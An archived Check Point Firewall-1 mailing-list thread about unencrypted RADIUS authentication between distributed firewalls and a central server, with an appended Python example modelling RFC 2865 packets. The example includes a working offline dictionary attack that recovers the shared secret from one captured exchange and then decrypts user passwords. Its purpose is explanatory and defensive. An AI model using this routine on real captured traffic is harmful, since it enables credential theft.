
Re: [FW-1] Encrypted Radius requests from distributed FW's to centralized radius server



That's doable but with some cost.
You need to disable the "Allow Firewall-1 Control Connections" option in the
global properties.  That is because this option allows the FW itself to send out
RADIUS requests first.  You can see this by looking at the implied rules.  So, turn this
off and configure the policy to enable control connections manually. Configure
the VPN to include the connections from the FW itself.  This should work as it
worked for me.
Another option you might consider, which I didn't try, is to configure your
RADIUS server and the firewall to use a non-standard RADIUS port so that you can
avoid getting filtered by the implied rule.

HTH,

Sun
Infonet Services




From: "Kalat, Andrew (ISS Atlanta)" <[email protected]>
Sent by: Mailing list for discussion of Firewall-1 <[email protected]>
To: [email protected]
Subject: [FW-1] Encrypted Radius requests from distributed FW's to centralized radius server
Date: 02/28/2003 07:58 AM
Please respond to: Mailing list for discussion of Firewall-1

Hello,
     Not to be a bother, but unfortunately I didn't hear anything on
this, so I am resending.

I'm hoping someone has had experience with this situation. It would seem
fairly common. Firewalls are Checkpoint NG, FP3, running on Solaris.
Radius is Steel Belted running on Windows.

Given 3 firewalls, A, B, and C. They are distributed around the internet,
connecting various networks over a VPN.

Radius server (raz) is authenticating remote users to all three
firewalls. This radius server (raz) resides behind firewall A.
Authentication requests from A,B, and C all travel to raz.

Here's the rub.  The outbound radius requests from B and C happen before
any VPN rules, and as such, they are traversing the net unencrypted.
This is not a problem for A, since raz is on a DMZ behind A. So, does
anyone know how to get B and C to use their established VPNs to A to
tunnel this authentication traffic?

Much appreciated to anyone who can provide insight or pointers. Take
care.




---------------------------------------------------------
Andrew J. Kalat, MSS Senior Security Engineer
Internet Security Systems, Inc.
6303 Barfield Road, Atlanta, GA 30328
E-Mail: [email protected]
<http://www.iss.net/>
PGP key available.
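Added example, not code from the original thread, from Check Point, or from the RADIUS vendor: a small RFC 2865 model of the Access-Request/Access-Accept exchange that Andrew describes leaving firewalls B and C in the clear, and that Sun's fix (getting the gateway's own RADIUS traffic to match the VPN rule) is meant to protect. The user name, NAS address, password and shared secret are constructed sample values, and the candidate-secret list is an assumed attacker wordlist. The point it demonstrates is what a passive observer on the Internet path actually gets: User-Name and NAS-IP-Address travel in plaintext, only User-Password is hidden (XORed with an MD5 keystream derived from the shared secret and the Request Authenticator), and a single captured request/response pair is enough to test shared-secret guesses offline against the Response Authenticator, after which every captured password can be unhidden.

```python
# Added example (not from the original post, Check Point, or a RADIUS vendor):
# minimal RFC 2865 builder/parser showing what an unencrypted RADIUS exchange
# between a remote firewall (the NAS) and a central server exposes on the wire.
# All names, addresses, passwords and secrets below are constructed sample data.
import hashlib
import os
import struct

ACCESS_REQUEST = 1
ACCESS_ACCEPT = 2
ATTR_USER_NAME = 1
ATTR_USER_PASSWORD = 2
ATTR_NAS_IP_ADDRESS = 4


def hide_password(password, secret, authenticator):
    """RFC 2865 section 5.2 User-Password hiding.

    The password is null-padded to a multiple of 16 bytes; each block is XORed
    with MD5(secret || previous ciphertext block), seeded by the 16-byte Request
    Authenticator.  This is the only confidentiality RADIUS itself provides."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", authenticator
    for i in range(0, len(padded), 16):
        key = hashlib.md5(secret + prev).digest()
        block = bytes(a ^ b for a, b in zip(padded[i:i + 16], key))
        out, prev = out + block, block
    return out


def unhide_password(hidden, secret, authenticator):
    """Inverse of hide_password: anyone holding the shared secret can do this."""
    out, prev = b"", authenticator
    for i in range(0, len(hidden), 16):
        key = hashlib.md5(secret + prev).digest()
        out += bytes(a ^ b for a, b in zip(hidden[i:i + 16], key))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")


def parse_packet(data):
    """Split a RADIUS packet into (code, id, authenticator, {attr_type: value})."""
    code, ident, length = struct.unpack("!BBH", data[:4])
    attrs, pos = {}, 20
    while pos < length:
        atype, alen = data[pos], data[pos + 1]
        attrs[atype] = data[pos + 2:pos + alen]
        pos += alen
    return code, ident, data[4:20], attrs


def build_access_request(ident, username, password, nas_ip, secret, authenticator=None):
    """Build the UDP payload a NAS (here, the remote firewall) sends to the server."""
    if authenticator is None:
        authenticator = os.urandom(16)            # fresh random Request Authenticator
    attrs = bytes([ATTR_USER_NAME, 2 + len(username)]) + username
    hidden = hide_password(password, secret, authenticator)
    attrs += bytes([ATTR_USER_PASSWORD, 2 + len(hidden)]) + hidden
    attrs += bytes([ATTR_NAS_IP_ADDRESS, 6]) + bytes(int(o) for o in nas_ip.split("."))
    header = struct.pack("!BBH", ACCESS_REQUEST, ident, 20 + len(attrs))
    return header + authenticator + attrs


def build_response(code, request, secret, attrs=b""):
    """Server reply; Response Authenticator = MD5(Code+ID+Length+RequestAuth+Attrs+Secret)."""
    _, ident, req_auth, _ = parse_packet(request)
    header = struct.pack("!BBH", code, ident, 20 + len(attrs))
    return header + hashlib.md5(header + req_auth + attrs + secret).digest() + attrs


def observer_view(request):
    """What a sniffer on the unencrypted path reads WITHOUT knowing the secret."""
    _, _, _, attrs = parse_packet(request)
    return {
        "user_name": attrs[ATTR_USER_NAME].decode(),
        "nas_ip": ".".join(str(b) for b in attrs[ATTR_NAS_IP_ADDRESS]),
        "hidden_password_hex": attrs[ATTR_USER_PASSWORD].hex(),
    }


def recover_secret(request, response, candidates):
    """Offline dictionary attack: the Response Authenticator is an unkeyed MD5 over
    public fields plus the secret, so one captured pair lets an observer test
    secret guesses locally; the winning guess then unhides every captured password."""
    _, _, req_auth, _ = parse_packet(request)
    header, resp_auth, attrs = response[:4], response[4:20], response[20:]
    for cand in candidates:
        if hashlib.md5(header + req_auth + attrs + cand).digest() == resp_auth:
            return cand
    return None


if __name__ == "__main__":
    secret = b"s3cret"                                   # constructed shared secret
    req = build_access_request(7, b"akalat", b"hunter2", "10.1.2.3", secret)
    resp = build_response(ACCESS_ACCEPT, req, secret)
    print("observer sees:", observer_view(req))          # user name and NAS IP in clear
    guessed = recover_secret(req, resp, [b"password", b"radius", b"s3cret"])
    print("secret recovered:", guessed)
    if guessed:
        _, _, auth, attrs = parse_packet(req)
        print("password recovered:", unhide_password(attrs[ATTR_USER_PASSWORD], guessed, auth))
```

RADIUS is UDP, port 1812 per RFC 2865 (1645 on older deployments). Moving it to a non-standard port, as Sun suggests, only changes which rule the gateway's own request matches; the protection still comes from the VPN rule that the packet then falls through to, so the check after either change is the same: capture on the outside interface of B or C and confirm the RADIUS packet leaves as ESP, not as cleartext UDP.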

=================================================
To set vacation, Out Of Office, or away messages,
send an email to [email protected]
in the BODY of the email add:
set fw-1-mailinglist nomail
=================================================
To unsubscribe from this mailing list,
please see the instructions at
http://www.checkpoint.com/services/mailing.html
=================================================
If you have any questions on how to change your
subscription options, email
[email protected]
=================================================




 